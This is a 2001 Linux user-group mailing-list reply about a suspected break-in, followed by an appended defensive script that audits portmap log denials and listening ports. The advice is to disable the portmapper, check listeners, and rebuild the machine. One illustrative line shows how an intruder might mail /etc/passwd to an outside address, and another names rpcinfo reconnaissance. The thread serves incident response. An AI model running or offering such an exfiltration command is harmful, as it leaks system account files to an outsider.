SLUG Mailing List Archives
Re: [SLUG] Security Breach
- To: Sean Carmody <sean@xxxxxxxxxxxxxxxxxxxxxxxxxxx>
- Subject: Re: [SLUG] Security Breach
- From: Umar Goldeli <umar@xxxxxxxxxxxxxx>
- Date: Wed Feb 28 11:35:02 2001
- Cc: slug@xxxxxxxxxxx
> Feb 28 01:53:07 emu portmap: connect from 126.96.36.199 to
> getport(status): request from unauthorized host
Why are you running the portmapper? Turn it off if you don't specifically
a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)
If you don't recognize it as something you specifically need - turn it
Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p <yourip> or similar and your config recognized that he
As above - if you don't need portmap, turn it off.
> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?
Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer overflow with something like
"/bin/mailx < /etc/passwd bob@xxxxxxxxxxx" etc.. (or something like
It could be anything.. either way - you know that something has
happened. Make an executive decision to decide if it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).
If you can, pull the box out of prod and put in a new box while you
examine the compromised one.
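As an added illustration of the two checks suggested in the reply above (pulling the portmap denials out of syslog, and auditing what the box is actually listening on), here is a small POSIX shell script. It is not part of the original mail. The syslog lines and the `netstat -an` output are constructed samples using RFC 5737 documentation addresses, and the EXPECTED_PORTS allowlist is a hypothetical setting you would fill in for your own machine.

```shell
#!/bin/sh
# Constructed sample: portmap denials as they appear in /var/log/messages,
# plus one unrelated sshd line to show that non-portmap lines are ignored.
SAMPLE_LOG='Feb 28 01:53:07 emu portmap: connect from 192.0.2.10 to getport(status): request from unauthorized host
Feb 28 01:53:09 emu portmap: connect from 192.0.2.10 to getport(mountd): request from unauthorized host
Feb 28 02:10:41 emu portmap: connect from 198.51.100.7 to getport(status): request from unauthorized host
Feb 28 02:11:00 emu sshd[812]: Accepted password for sean from 203.0.113.5 port 40122'

# Constructed sample of "netstat -an" output (Linux column layout).
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN
tcp        0    112 10.0.0.5:22             203.0.113.5:40122       ESTABLISHED'

# Hypothetical allowlist: the ports you have consciously decided to run.
# Anything listening that is not here is a question you must answer.
EXPECTED_PORTS="22 25"

# Which hosts probed the portmapper and how many getport() requests each
# was refused. Output: "<ip> <count>", one per line, sorted by address.
portmap_probes() {
    printf '%s\n' "$SAMPLE_LOG" \
      | sed -n 's/.*portmap: connect from \([0-9.]*\) to getport(\([a-z]*\)): request from unauthorized host.*/\1 \2/p' \
      | awk '{ count[$1]++ } END { for (h in count) print h, count[h] }' \
      | sort
}

# Every TCP port in LISTEN state, taken from the "Local Address" column.
# Only rows whose State column is LISTEN are considered, so header lines,
# established connections and (stateless) udp rows are skipped.
listening_ports() {
    printf '%s\n' "$SAMPLE_NETSTAT" \
      | awk '$6 == "LISTEN" { n = split($4, a, ":"); print a[n] }' \
      | sort -n
}

# Listening ports that are not on the allowlist: the "evil things (tm)"
# candidates to either recognise and add, or to shut down.
unexpected_listeners() {
    for port in $(listening_ports); do
        case " $EXPECTED_PORTS " in
            *" $port "*) ;;                  # expected, nothing to report
            *) printf '%s\n' "$port" ;;
        esac
    done
}

echo "portmap denials per source host:"
portmap_probes
echo "listening ports not on the allowlist:"
unexpected_listeners
```

On a live box, replace the two `printf '%s\n' "$SAMPLE_..."` producers with `grep portmap /var/log/messages` and `netstat -an` respectively; the sed and awk stages stay the same. Port 111 (sunrpc) showing up in the unexpected list is exactly the situation in the thread: if nothing on the machine needs NFS or other RPC services, the portmapper is a listener to remove rather than to allowlist.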